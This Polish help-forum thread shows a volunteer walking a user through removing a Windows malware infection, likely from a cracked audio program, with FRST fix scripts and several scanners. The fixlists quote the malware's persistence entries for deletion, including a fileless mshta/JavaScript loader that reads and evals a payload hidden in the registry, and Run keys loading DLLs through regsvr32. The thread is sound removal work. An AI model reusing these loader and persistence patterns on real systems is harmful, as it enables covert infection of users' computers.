adamzlf Opublikowano 6 Czerwca 2016 Zgłoś Udostępnij Opublikowano 6 Czerwca 2016 po oczyszczeniu komputera przez Panią Picasso przez tydzień był całkowity spokój, lecz teraz zeby się zalogować potrzebuje około 10-20 resetów zeby w końcu maszyna zaskoczyła i nie resetowała się ani z windowsa ani przed jego bootem ...do tego podczas uruchamiania doszły dziwne processy ... nigdy ich wcześniej nie było ( za kazdym razem przy starcie pc włączam menager zadań i gaszę zbędne funkcje więc te procesy przykuły moją uwagę )http://www.wstaw.org/w/3YBj/linki/msha.exe powershell.exete procesy potrafią sie odpalić3-5 krotnie przy starcie systemu. tmp81D1.exe ma w opisie The Witcher 3 ... na moim sprzęcie to nawet instalator do tej gry by się nie odpalił a z kolei w msconfig takie mam cudeńka w autostarcie 5x system operacyjny windows ....http://www.wstaw.org/w/3YBn/ pojawiło się także "konto nieznane" ( znowu jakieś update nvidii czy jaki grom tym razem ???-.-).http://www.wstaw.org/w/3YBq/linki/ i kolejna sprawa podczas crash dumpów co około piąty reset na blue screenie pojawiaja sie "artefakty" tak jakby karta graficzna się przegrzewała ... potrafią wyskakiwać nawet w DOSie, po resecie znikają.wszystko zaczęło się po skończonym free trialu kasperskiego .... Daję link do działu hardware gdzie także założyłem temat .... nie wiem gdzie leży problem w sofcie czy sprzęciehttps://www.fixitpc.pl/topic/30456-samoczynne-resetyblue-screen/ niebawem podeśle logi a puki co daje post zeby znowu reset sie nie walną w połowie pisania -.- Addition.txt FRST.txt Odnośnik do komentarza
picasso Opublikowano 7 Czerwca 2016 Zgłoś Udostępnij Opublikowano 7 Czerwca 2016 Jest tu infekcja i to grubszego kalibru niż Twój poprzedni problem z Google Chrome. W systemie działają trojany ładowane z miejsc maskowanych znakami null (wpisy są niewidoczne dla wielu narzędzi), w tym infekcja "bezplikowa" ładowana wprost z rejestru. Załączony tu plik FRST.txt jest nawet blokowany przez Windows Defender ze względu na te specjalne ciągi, ale log sam w sobie nie jest oczywiście "niebezpieczny". Natomiast BSODy wyglądają na odrębny problem i być może właśnie sprzętowy. Na szybko przejrzałam te pliki DMP i niespójne wyniki, ale tak jakby kręcące się wokół sprzętu (m.in. msahci.sys i nvlddmkm.sys są wyliczane jako przyczynowy sterownik). Akcja wstępna: 1. Otwórz Notatnik i wklej w nim: CloseProcesses: CreateRestorePoint: (Microsoft Corporation) C:\Windows\explorer.exe HKU\S-1-5-21-813231136-3034751300-3063813572-1001\Software\Classes\f84341: mshta "javascript:eDvhqj2rc="B6ExoD";Z9s=new ActiveXObject("WScript.Shell");QCBCP2GB="4";eMU69v=Z9s.RegRead("HKCU\\software\\ynqlzjycy\\cilw");Sy0XO8impn="9lR";eval(eMU69v);Vkc9RSvI="gTED";" HKU\S-1-5-21-813231136-3034751300-3063813572-1001\...\Run: [**rkia] => mshta javascript:n4uaVOOu="5p";O3p=new%20ActiveXObject("WScript.Shell");Yz2gyJz="xLc5lUr";Ano3o=O3p.RegRead("HKCU\\software\\ynqlzjycy\\cilw");C6REIhse="J";eval(Ano3o);T4sWWTxwN="RLHc4j"; HKU\S-1-5-21-813231136-3034751300-3063813572-1001\...\Run: [**uzan] => "C:\Users\Pawcio\AppData\Local\67af67\9941b9.lnk" HKU\S-1-5-21-813231136-3034751300-3063813572-1001\...\Run: [Odvics] => C:\Users\Pawcio\AppData\Local\Odvics\tmp802C.exe [143918 2016-06-01] () HKU\S-1-5-21-813231136-3034751300-3063813572-1001\...\Run: [iksoft] => regsvr32.exe C:\Users\Pawcio\AppData\Local\Iksoft\jtxbikrl.dll HKU\S-1-5-21-813231136-3034751300-3063813572-1001\...\Run: [AXworks] => C:\Windows\SysWOW64\regsvr32.exe C:\Users\Pawcio\AppData\Local\Odvics\jtxbikrl.dll Task: {8657D7CA-AFC8-4C62-85F0-A83DE2E4D8D6} - System32\Tasks\{4D653D61-D83C-4579-ACA8-FB751AF29D98} => pcalua.exe -a "C:\Downloads\Sound Booster\Sound Booster.exe" -d "C:\Downloads\Sound Booster" DeleteKey: HKCU\Software\ynqlzjycy DeleteKey: HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\mountpoints2 DeleteKey: HKLM\SOFTWARE\Microsoft\Shared Tools\MSConfig\startupfolder\C:^Users^Pawcio^AppData^Roaming^Microsoft^Windows^Start Menu^Programs^Startup^339bc1.lnk DeleteKey: HKLM\SOFTWARE\Microsoft\Shared Tools\MSConfig\startupreg\Akamai NetSession Interface DeleteKey: HKLM\SOFTWARE\Microsoft\Shared Tools\MSConfig\startupreg\AXworks DeleteKey: HKLM\SOFTWARE\Microsoft\Shared Tools\MSConfig\startupreg\Iksoft DeleteKey: HKLM\SOFTWARE\Microsoft\Shared Tools\MSConfig\startupreg\Odvics DeleteKey: HKLM\SOFTWARE\Mozilla DeleteKey: HKLM\SOFTWARE\MozillaPlugins DeleteKey: HKLM\SOFTWARE\Wow6432Node\Mozilla DeleteKey: HKLM\SOFTWARE\Wow6432Node\MozillaPlugins S3 usbbus; system32\DRIVERS\lgx64bus.sys [X] S3 UsbDiag; system32\DRIVERS\lgx64diag.sys [X] S3 USBModem; system32\DRIVERS\lgx64modem.sys [X] S3 xhunter1; \??\C:\Windows\xhunter1.sys [X] S3 xspirit; \??\C:\Windows\xspirit.sys [X] C:\Users\Administrator C:\Users\HomeGroupUser$ C:\Users\Gość C:\Users\Pawcio\AppData\Local\{7EE9EBB6-D944-4670-A12B-6374FC4BDE72} C:\Users\Pawcio\AppData\Local\67af67 C:\Users\Pawcio\AppData\Local\CrashRpt C:\Users\Pawcio\AppData\Local\Iksoft C:\Users\Pawcio\AppData\Local\Odvics C:\Users\Pawcio\AppData\Roaming\Introvert.J C:\Users\Pawcio\AppData\Roaming\Registry.dll C:\Users\Pawcio\AppData\Roaming\Temporary.5 C:\Users\Pawcio\AppData\Roaming\d0ef40 C:\Users\Pawcio\AppData\Roaming\FF32A6D9-ACAE-42F5-AE3C-A6CAF0BDEBA9 C:\Users\Pawcio\AppData\Roaming\vlc C:\Users\Pawcio\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\ImplicitAppShortcuts\69639df789022856\Google Chrome.lnk C:\Users\Pawcio\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\ImplicitAppShortcuts\9501e18d7c2ab92e\Google Chrome.lnk C:\Users\UpdatusUser C:\Windows\pss\339bc1.lnk.Startup CMD: netsh advfirewall reset EmptyTemp: Adnotacja dla innych czytających: skrypt unikatowy - dopasowany tylko i wyłącznie pod ten system, proszę nie stosować na swoich systemach. Plik zapisz pod nazwą fixlist.txt w folderze z którego uruchamiasz FRST. Uruchom FRST i kliknij w Napraw (Fix). Czekaj cierpliwie, nie przerywaj działania. Gdy Fix ukończy pracę, nastąpi restart systemu. W tym samym katalogu skąd uruchamiano FRST powstanie plik fixlog.txt. 2. Odinstaluj Kaspersky Internet Security, skoro trial wygasł. Następnie zastosuj jeszcze narzędzie Kaspersky Remover. 3. Zrób nowy log FRST z opcji Skanuj (Scan), z Addition i Shortcut, oraz zaległy obowiązkowy GMER. Dołącz też plik fixlog.txt. Odnośnik do komentarza
adamzlf Opublikowano 7 Czerwca 2016 Autor Zgłoś Udostępnij Opublikowano 7 Czerwca 2016 Fixlog.txt się zablokował i chciał uprawnień administratora więc go przekopiowałem wbrew jego woli :]...dwa pierwsze punkty wykonane, nauczę się jak uzywać Gmer'a i niebawem podeślę skany z niego ... Dodam ze po pracy FRST'a i resecie systemu program explorer.exe chciał dostępu do sieci, której oczywiście mu odmówiłem.nie wiem czy dobrze skanuję gmer'em .... wszystko zaznaczyłem jak w poradniczku ale zaznaczyłem dysk C:\ zamiast quick skan, nie wiedziałem którą opcje wybrać więc zmieniłem na dysk C hmm kiedy komputer zaczął " świrować" odłączyłem dysk 160 giga .... czy powinienem go teraz podłączyć, zeby później nie zainfekować się ponownie ? ... nie wiem czy uda mi się dokończyć skan Gmer'em .... resety kontr atakują... po ostatnim resecie rozdzielczość ekranu uległa zmianie na 800x600 dziwne .. przy próbie jej zmiany odkryłem ze pełne spektrum rozdzielczości zostało zredukowane do 4 screen poniżejhttp://www.wstaw.org/w/3YG3/linki/ ... i pojawił się kolejny proces do którego nie mam uprawnień aby go zamknąćhttp://www.wstaw.org/w/3YG6/linki/ Addition.txt FRST.txt Shortcut.txt Fixlog - Kopia.txt Odnośnik do komentarza
picasso Opublikowano 7 Czerwca 2016 Zgłoś Udostępnij Opublikowano 7 Czerwca 2016 Wszystko pomyślnie usunięte. Drobna poprawka na szczątki po SpyHunter i puste skróty. Otwórz Notatnik i wklej w nim: RemoveDirectory: C:\FRST\Quarantine RemoveDirectory: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\GOG.com\Baldur's Gate - Enhanced Edition\Documents RemoveDirectory: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Epistory - Typing Chronicles RemoveDirectory: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Shadowrun Returns RemoveDirectory: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\SpyHunter4 RemoveDirectory: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\WolfTeam-US S3 EsgScanner; C:\Windows\System32\DRIVERS\EsgScanner.sys [19984 2015-12-16] () CMD: del /q "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Diablo II\Lord of Destruction Czytaj to.lnk" CMD: del /q "C:\Users\Pawcio\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\SpyHunter4.lnk" CMD: del /q "C:\Users\Pawcio\AppData\Roaming\Microsoft\Windows\SendTo\Gry.lnk" CMD: del /q "C:\Users\Pawcio\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\MEGAsync\MEGA Website.lnk" CMD: del /q "C:\Users\Pawcio\Desktop\DungeonRift.lnk CMD: del /q C:\Windows\System32\DRIVERS\EsgScanner.sys Plik zapisz pod nazwą fixlist.txt w folderze z którego uruchamiasz FRST. Uruchom FRST i kliknij w Napraw (Fix). Przedstaw wynikowy fixlog.txt. Odnośnik do komentarza
adamzlf Opublikowano 7 Czerwca 2016 Autor Zgłoś Udostępnij Opublikowano 7 Czerwca 2016 CMD: del /q "C:\Users\Pawcio\AppData\Roaming\Microsoft\Windows\SendTo\Gry.lnk"mogę pominąć te polecenie ? dodałem to ręcznie ... nadal nie mogę zakończyć pracy Gmera....resety....po którymś resecie z kolei byłem zmuszony przywrócić system, po uruchomieniu windowsa podejrzany process tmp802c.exe powrócił w obstawie kilku procesów regsvr32.exehttp://www.wstaw.org/w/3YG9/linki/takie okienka wyskoczyły przy starcie windowsa http://www.wstaw.org/w/3YGa/linki/ Odnośnik do komentarza
picasso Opublikowano 7 Czerwca 2016 Zgłoś Udostępnij Opublikowano 7 Czerwca 2016 A dlaczego pominąć? Przecież to pusty skrót w menu kontekstowym "Wyślij do": Shortcut: C:\Users\Pawcio\AppData\Roaming\Microsoft\Windows\SendTo\Gry.lnk -> C:\Users\Pawcio\Desktop\Gry (Brak pliku) Odnośnik do komentarza
adamzlf Opublikowano 7 Czerwca 2016 Autor Zgłoś Udostępnij Opublikowano 7 Czerwca 2016 przepraszam jestem jakiśrozkojarzony ... nie było pytania ^^ fixlog Fixlog.txt Odnośnik do komentarza
picasso Opublikowano 7 Czerwca 2016 Zgłoś Udostępnij Opublikowano 7 Czerwca 2016 po którymś resecie z kolei byłem zmuszony przywrócić system, po uruchomieniu windowsa podejrzany process tmp802c.exe powrócił w obstawie kilku procesów regsvr32.exe Niestety to oznacza, że odwróciłeś wszystkie moje akcje usuwające i przywróciłeś infekcję. Robota od początku, czyli nowe logi FRST dostacz (wszystkie trzy). GMER na razie pomiń. Odnośnik do komentarza
adamzlf Opublikowano 7 Czerwca 2016 Autor Zgłoś Udostępnij Opublikowano 7 Czerwca 2016 kiedy komputer zaczął " świrować" odłączyłem dysk 160 giga .... czy powinienem go teraz podłączyć, zeby później nie zainfekować się ponownie ?raporty frst Addition.txt FRST.txt Shortcut.txt Odnośnik do komentarza
picasso Opublikowano 7 Czerwca 2016 Zgłoś Udostępnij Opublikowano 7 Czerwca 2016 Zewnętrzny dysk nie ma tu nic do rzeczy, to nie ten rodzaj infekcji. I powtarzamy kroki usuwające, czyli wykonaj ponownie instrukcje podane w moim pierwszym poście #3. Jak mówię, GMER omiń. Odnośnik do komentarza
adamzlf Opublikowano 7 Czerwca 2016 Autor Zgłoś Udostępnij Opublikowano 7 Czerwca 2016 oto efekty Addition.txt FRST.txt Shortcut.txt Fixlog (3).txt Odnośnik do komentarza
picasso Opublikowano 7 Czerwca 2016 Zgłoś Udostępnij Opublikowano 7 Czerwca 2016 Wszystko zrobione. Poprawki: 1. Wyczyść foldery Przywracania systemu: KLIK. 2. Otwórz Notatnik i wklej w nim: CreateRestorePoint: HKLM-x32\...\RunOnce: [unKIS] => wscript.exe //b C:\Users\Pawcio\AppData\Local\Temp\UnKIS.vbs R4 KAVRemvr; C:\Users\Pawcio\AppData\Local\Temp\{F4E006CA-FDC0-48FA-B340-F584297F2573}\kavremover.exe [9231432 2016-06-07] (Kaspersky Lab ZAO) CHR HKLM-x32\...\Chrome\Extension: [dhigneefebkcagnpnpbibganpmfgebnk] - hxxps://clients2.google.com/service/update2/crx S3 EsgScanner; C:\Windows\System32\DRIVERS\EsgScanner.sys [19984 2015-12-16] () R4 cm_km; system32\DRIVERS\cm_km.sys [X] R4 kl1; system32\DRIVERS\kl1.sys [X] R4 klbackupdisk; system32\DRIVERS\klbackupdisk.sys [X] R4 klbackupflt; system32\DRIVERS\klbackupflt.sys [X] R4 kldisk; system32\DRIVERS\kldisk.sys [X] R4 klflt; system32\DRIVERS\klflt.sys [X] R4 KLIF; system32\DRIVERS\klif.sys [X] U4 klkbdflt2; system32\DRIVERS\klkbdflt2.sys [X] R4 klpd; system32\DRIVERS\klpd.sys [X] R4 kltdi; system32\DRIVERS\kltdi.sys [X] R4 kneps; system32\DRIVERS\kneps.sys [X] RemoveDirectory: C:\FRST\Quarantine RemoveDirectory: C:\Users\Pawcio\AppData\Local\Temp\{F4E006CA-FDC0-48FA-B340-F584297F2573} CMD: del /q C:\DelFix.txt CMD: del /q C:\Users\Pawcio\Desktop\DungeonRift.lnk CMD: del /q C:\Windows\Minidump\*.dmp CMD: del /q C:\Windows\System32\DRIVERS\EsgScanner.sys CMD: netsh advfirewall reset Plik zapisz pod nazwą fixlist.txt w folderze z którego uruchamiasz FRST. Uruchom FRST i kliknij w Napraw (Fix). Przedstaw wynikowy fixlog.txt. 3. Przeprowadź skanowanie za pomocą Hitman Pro. Dostarcz log, o ile wykryje coś innego niż plik FRST64.exe (fałszywy alarm). Odnośnik do komentarza
adamzlf Opublikowano 7 Czerwca 2016 Autor Zgłoś Udostępnij Opublikowano 7 Czerwca 2016 wykrył coś więcej .... podejrzane pliki to moim zdaniem fałszywe alarmy .... chociaż DFX ( program do boostowania audio [ boski swoją drogą ] ) pobrałem z niepewnego torrenta .... ale problemy występowały juz wcześniej .... to samo raczej bedzie się tyczyć plików Steam.api.dll oczywiście mogę nie mieć racji wszystko bezdyskusyjnie moze być skasowane ... ...nie wiem ile jeszcze dziś wysiedze przed pc ... jestem bardzo zmęczony po pracy, jakbym przestał odpisywać to pewnie śpie na klawiaturze ....^^ ... jak to coś pomoże to bede następnego dnia od 18 .... Fixlog.txt HitmanPro_20160607_2032.txt Odnośnik do komentarza
picasso Opublikowano 7 Czerwca 2016 Zgłoś Udostępnij Opublikowano 7 Czerwca 2016 1. Ze zmęczenia przeoczyłam jeden aktywny wpis malware (Sathurbot). Poprawka. Do Notatnika wklej: CloseProcesses: (Microsoft Corporation) C:\Windows\explorer.exe ShellIconOverlayIdentifiers: [0PerformanceMonitor] -> {3B5B973C-92A4-4855-9D3F-0F3D23332208} => C:\ProgramData\Microsoft\Performance\Monitor\PerformanceMonitor.dll [2016-05-28] () RemoveDirectory: C:\ProgramData\Microsoft\Performance RemoveDirectory: C:\Users\Pawcio\Desktop\Nowy folder (6)\hmm\FRST-OlderVersion Plik zapisz pod nazwą fixlist.txt w folderze z którego uruchamiasz FRST. Uruchom FRST i kliknij w Napraw (Fix). Nastąpi restart. Przedstaw wynikowy fixlog.txt. 2. Pozostałe wyniki z Hitman: steam_api.dll owszem wygląda na fałszywy alarm, ale za resztę nie dam głowy. Odnośnik do komentarza
adamzlf Opublikowano 8 Czerwca 2016 Autor Zgłoś Udostępnij Opublikowano 8 Czerwca 2016 fixlog ... kilka niechcianych procesów chyba powróciło http://www.wstaw.org/w/3YMa/linki/ tak jak mówiłem, wszystko co podejrzane moze zniknać, więc co usuwać co zostawiać Fixlog - Kopia.txt Odnośnik do komentarza
picasso Opublikowano 8 Czerwca 2016 Zgłoś Udostępnij Opublikowano 8 Czerwca 2016 Te procesy wskazują, że załadowane zostało kolejne malware... Poproszę o nowe raporty FRST.txt + Addition.txt. Odnośnik do komentarza
adamzlf Opublikowano 8 Czerwca 2016 Autor Zgłoś Udostępnij Opublikowano 8 Czerwca 2016 hmmm co moze powodować ponowny load tego świństwa ? nie podpinałem tego starego dysku 160 gb ... Addition.txt FRST.txt Odnośnik do komentarza
picasso Opublikowano 8 Czerwca 2016 Zgłoś Udostępnij Opublikowano 8 Czerwca 2016 Być może te konkretne wpisy zdążyły się załadować na skutek aktywności modułu Sathurbot, który omyłkowo ominęłam. Ale ogólnie to mnie zastanawia skąd te wszystkie infekcje nabyłeś.... Część wygląda mi na robotę jakiegoś cracka... 1. Otwórz Notatnik i wklej w nim: CloseProcesses: (Microsoft Corporation) C:\Windows\explorer.exe HKU\S-1-5-21-813231136-3034751300-3063813572-1001\...\Run: [Odvics] => C:\Users\Pawcio\AppData\Local\Odvics\tmp41F0.exe [115326 2016-06-08] () HKU\S-1-5-21-813231136-3034751300-3063813572-1001\...\Run: [iksoft] => regsvr32.exe C:\Users\Pawcio\AppData\Local\Iksoft\trlkoxzc.dll HKU\S-1-5-21-813231136-3034751300-3063813572-1001\...\Run: [AXworks] => C:\Windows\SysWOW64\regsvr32.exe C:\Users\Pawcio\AppData\Local\Odvics\gtvluhlp.dll C:\Users\Pawcio\AppData\Local\Iksoft C:\Users\Pawcio\AppData\Local\Odvics C:\Users\Pawcio\AppData\Roaming\Aero.dll C:\Users\Pawcio\AppData\Roaming\Percale.w C:\Users\Pawcio\AppData\Roaming\Quadrate.uYS CMD: netsh advfirewall reset EmptyTemp: Plik zapisz pod nazwą fixlist.txt w folderze z którego uruchamiasz FRST. Uruchom FRST i kliknij w Napraw (Fix). Nastąpi restart. Przedstaw wynikowy fixlog.txt. 2. Zrób nowy log z FRST (tylko główny FRST.txt). Dodatkowo sprawdź także czy coś wykrywa Kaspersky TDSSKiller, a jeśli tak, dostarcz z niego log. Odnośnik do komentarza
adamzlf Opublikowano 8 Czerwca 2016 Autor Zgłoś Udostępnij Opublikowano 8 Czerwca 2016 to zapewne zasługa Cracka do DFX Audio Enhancer którego pobrałem z nieznanej mi stronki z torrentami ... po instalacji tego programu nie było w ogóle dźwięku na komputerze jeżeli ten program był wyłączony,... ciągle mnie niepokoją te " artefakty " które wystąpiły moze w sumie z 3-6 razy hmmm czy to w ogóle możliwe zeby jakieś niechciane oprogramowanie mogło powodować coś takiego ? a zwłaszcza w dosie ?TDS nic nie wykrył ale coś mam przeczucie ze to chyba jeszcze nie koniec :^^ EDIT : na dysku C pojawił się ukryty folder Config.msi nie mam o niego dostępu i jakoś nie potrafie jego uzyskać .... i jestem pewny ze wcześniej go nie było ... FRST - Kopia.txt Fixlog - Kopia.txt Odnośnik do komentarza
picasso Opublikowano 8 Czerwca 2016 Zgłoś Udostępnij Opublikowano 8 Czerwca 2016 Też podejrzewam crack do tego programu, gdyż wg pierwszego raportu FRST jedno z pierwszych wystąpień malware na dysku oraz obiekty DFX powstały w przeciągu 6 minut. Kolejna porcja zadań: 1. Odinstaluj DFX Audio Enhancer. Po deinstalacji przez SHIFT+DEL (omija Kosz) skasuj z dysku wszystkie pliki/foldery powiązane z programem, wliczając pobrany crack, oraz folder FRST z kwarantanną trojanów: C:\FRST C:\Downloads\DFX Audio Enhancer 11.109 Incl Crack [TorDigger] C:\Program Files (x86)\DFX C:\ProgramData\Microsoft\Windows\Start Menu\Programs\DFX Audio Enhancer C:\Users\Pawcio\AppData\Local\DFX C:\Users\Pawcio\Desktop\DFX.exe Ponów skan Hitman i usuń na wszelki wypadek pozostałe wyniki, z wyłączeniem steam_api.dll i Warlocks.exe. 2. Przeprowadź skanowanie za pomocą ESET Online Scanner i dostarcz wyniki, o ile coś zostanie znalezione. ciągle mnie niepokoją te " artefakty " które wystąpiły moze w sumie z 3-6 razy hmmm czy to w ogóle możliwe zeby jakieś niechciane oprogramowanie mogło powodować coś takiego ? a zwłaszcza w dosie ? Problem nie powiązany z widzianym tu malware, nie ten poziom modyfikacji. To raczej problem sprzętowy. Odnośnik do komentarza
adamzlf Opublikowano 8 Czerwca 2016 Autor Zgłoś Udostępnij Opublikowano 8 Czerwca 2016 rozumiem ze to co wykryje hitman, mam usunąć ręcznie tak ? Odnośnik do komentarza
picasso Opublikowano 8 Czerwca 2016 Zgłoś Udostępnij Opublikowano 8 Czerwca 2016 Za pomocą Hitman, pomijając wymienione przeze mnie wyniki i oczywiście sam FRST64.exe. Odnośnik do komentarza
adamzlf Opublikowano 8 Czerwca 2016 Autor Zgłoś Udostępnij Opublikowano 8 Czerwca 2016 sęk w tym ze hitman żąda klucza zeby przystąpić do usuwania ... nieważne juz pousuwałem ręcznie .... czytam o eset sekundka edit: chyba ze coś przeoczyłem w hitmanie ^^ nie wiem czy doczekam do końca skanu ESET .... śpiący ~~ Odnośnik do komentarza
picasso Opublikowano 8 Czerwca 2016 Zgłoś Udostępnij Opublikowano 8 Czerwca 2016 Skoro Hitman żąda klucza, to oznacza że był wcześniej używany (dalej niż 30 dni temu). Czyli teraz czekam na log z ESET. Czyszczenie owszem trwa, ale musi być pewność że usunęliśmy wszystkie ślady infekcji. Tu była poważniejsza infekcja. Odnośnik do komentarza
adamzlf Opublikowano 9 Czerwca 2016 Autor Zgłoś Udostępnij Opublikowano 9 Czerwca 2016 ESET się zamroził .,.. o 3:30 juz byt zawieszony i do tej pory się nie odwiesił ... ponowie skan i zobaczymy co będzie, proces esetonlinescanner_enu.exe*32 utkną na 192512 k pamięci w menadżerze zadań ....http://www.wstaw.org/w/3YRV/linki/edit : przed snem jeszcze spostrzegłem ze eset wykrył 4 zagrożenia, chyba trojany, nie pamiętam, juz ledwo widziałem na oczy i nie mogę sobie przypomnieć co to dokładnie było hmhmmh Odnośnik do komentarza
Rekomendowane odpowiedzi